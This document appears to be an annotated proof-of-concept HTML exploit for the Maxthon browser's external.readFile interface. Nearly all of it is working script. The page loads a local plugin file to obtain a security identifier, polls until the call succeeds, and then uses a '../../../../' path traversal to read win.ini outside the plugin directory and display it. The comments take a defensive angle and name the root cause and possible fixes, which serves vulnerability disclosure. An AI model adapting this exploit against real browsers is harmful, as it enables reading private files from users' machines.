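Maxthon arbitrary-file read/write exploit example. The listing below exercises only the read path (external.readFile with a "../" traversal); it contains no write call.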
83e15a14c4ca1f73136d1a24e593806b928158a0e285203e908ede1f7670d146
<html>
<!-- Includes a script file from the local Maxthon M2bookmark plugin directory.
     The inline script that follows reads max_security_id, which this page never
     defines; presumably the included max.src supplies it (not shown here, confirm
     against the plugin). The page depends on web content being allowed to load
     this local file, so that is one place a browser-side fix can cut the chain. -->
<script id="max" src="C:\Program Files\Maxthon\Plugin\M2bookmark\max.src"></script>
<script>
// Handle of the polling timer; null until window.setInterval() assigns it later in this script.
var iVuln=null;
/**
 * Polling probe. Asks the host browser's external.readFile() for the
 * M2bookmark plugin's own "plugin.ini" and treats a non-null result as
 * proof that the call succeeds from this page.
 *
 * max_security_id, pls and max are not declared in this script. pls and max
 * match element ids in the page markup; max_security_id is presumably set by
 * the included max.src (not shown, confirm).
 *
 * What a fix has to address: the identifier passed as the first argument is
 * the only thing gating the call here, so it must not be obtainable by web
 * content.
 */
function checkVuln() {
// Any exception (for example external.readFile or max_security_id being
// unavailable) is swallowed by the empty catch, so the next tick simply retries.
try {
// Non-null means the read of the plugin's own file went through.
if (external.readFile(max_security_id,"m2bookmark","plugin.ini")!=null) {
// Replace the "please open the sidebar" prompt in the page.
pls.innerText='Done!';
alert("Vulnerable!");
showFileContent();
// Stop polling; this runs only after showFileContent() has returned.
window.clearInterval(iVuln);
}
else {
// Clear the browser status-bar text.
window.status='';
// Refresh the "max.src" script by setting the source file as the same file
// (presumably so a newly available max_security_id is picked up, confirm).
max.src=max.src;
}
}
// Errors are deliberately ignored; see the note at the top of the try block.
catch(e) {}
}
/**
 * Reads win.ini through external.readFile() and shows the result in an alert.
 * The path starts with four "../" segments, so it is not confined to the
 * plugin named in the second argument; the alert text shows that the intended
 * target is C:\<dir>\win.ini. "WINDOWS" is tried first, then "WINNT" when the
 * first read returns null.
 *
 * Root cause shown here: the relative path is passed with its "../" segments
 * intact. The browser-side fix is to resolve the requested path and reject
 * anything that lands outside the plugin's own directory.
 */
function showFileContent() {
var dir="WINDOWS";
var content=external.readFile(max_security_id,"m2bookmark","../../../../"+dir+"/win.ini");
// Fallback for systems whose Windows directory is named WINNT.
if (content==null) {
dir="WINNT";
content=external.readFile(max_security_id,"m2bookmark","../../../../"+dir+"/win.ini");
}
// If both reads returned null, the alert still appears, with dir "WINNT" and content null.
alert("C:\\"+dir+"\\win.ini file content:\n"+content);
}
// Run checkVuln() every 1000 ms. The string argument is evaluated as code on each tick;
// the returned handle is kept so checkVuln() can cancel the timer.
iVuln=window.setInterval("checkVuln()",1000);
</script>
<body>
<!-- Prompt shown while the script polls; the script overwrites it through the
     element id "pls" once the probe succeeds. The wording indicates that user
     interaction (opening the M2Bookmark sidebar) is needed first, presumably
     because the identifier the script uses is not available before that. -->
<span id="pls">Please open the M2Bookmark sidebar...</span>
</body>
</html>